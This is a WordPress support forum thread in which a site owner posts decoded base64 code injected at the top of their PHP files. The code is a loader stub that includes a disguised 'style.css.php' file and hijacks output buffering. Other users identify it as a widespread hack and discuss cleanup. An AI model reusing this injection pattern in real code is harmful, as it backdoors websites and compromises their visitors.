WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Strange eval 64 code on top of php files (11 posts)

  1. Nessdufrat
    Member
    Posted 4 years ago #

    Hi!
    In my endless fight to get my visual editor working again, I noticed that almost all of my wp files have a string in base64 code at the top.
    By decoding it, I found out that it meant that :

    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/kunden/homepages/44/d152788678/htdocs/wordpress/wp-content/upgrade/superedit/wp-super-edit/superedit/tinymce_plugins/advhr/css/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

    What is it ? How come it appeared on my pages ? I doubt it's a hack, I don't see the point in hacking a website just to crash the visual editor and leave the database and the user rights alone...
    I checked in the database (I found a topic on this forum where base64 code would be added to the wp_options table), but no evil code here.

    I have already started to get rid of it on the main pages, but so far, it doesn't solve anything. What is it ???

  2. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    If I'm correct, it is...in fact....a hack

    It's a very common one that is infecting many many old WP installs

    You are going to have a lot of work ahead of you. Especially if you have other stuff on your hosting. Chances are, every php file on your server has been infected, not just that wp install.

    I'm working my way through the very same thing. Again....

    It doesn't just affect your editor, that's just a symptom

    I'm sure you've already seen this link
    http://codex.wordpress.org/FAQ_My_site_was_hacked

    but i'll include it in case.....

  3. Nessdufrat
    Member
    Posted 4 years ago #

    Yeah, I saw it... but thanks, actually, I'm glad I found out what it was, I was getting crazy with it.
    And you're right, I checked on my host, all my files were affected... It will take hours to get rid of all that... :(

  4. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    yeah...there are soooo many files.

    I've been hit twice. Usually, I reinstall everything....it's a pain

    But follow the advice in that link, or you'll get hit again unfortunately.

    Good luck!

  5. Nessdufrat
    Member
    Posted 4 years ago #

    The real pain in the ass was that I had planned to do a whole new WP install, and link all my websites to it, so that it could be easier to update. I had planned that for middle January, as well as the upgrade to WP 2.9. Now I'll have to clean all my files, and go through the whole upgrade process in two weeks...

  6. Nessdufrat
    Member
    Posted 4 years ago #

    After some research, the hack comes from a security failure in phpmyvisit, and affects all the php files on the server. Apparently, it only happened to people using 1&1 as host and having phpmyvisit installed...

  7. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    hmm...wonder if there was a similar issue at godaddy.

    After the last time I got hit, I cleaned up well, and secured my stuff. I had no problem for months,. Then it happened again. When it happened to me, several other people here had the same issue, all on godaddy servers.

    Can't ever be truly safe on shared servers I guess.....

  8. Nessdufrat
    Member
    Posted 4 years ago #

    Cleaning everything solved my problem. But I'll update ASAP.

  9. Advicemaven
    Member
    Posted 4 years ago #

    This same thing happened to me, and I do have GoDaddy hosting. I'm done cleaning, but what a mess.

  10. billy.braga
    Member
    Posted 4 years ago #

    Got same hack, and I'm at bluehost ... that's really a pain...

  11. billy.braga
    Member
    Posted 4 years ago #

    ...and me too, the location of the file had to do with tinymce... could tinymce be malicious ?

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags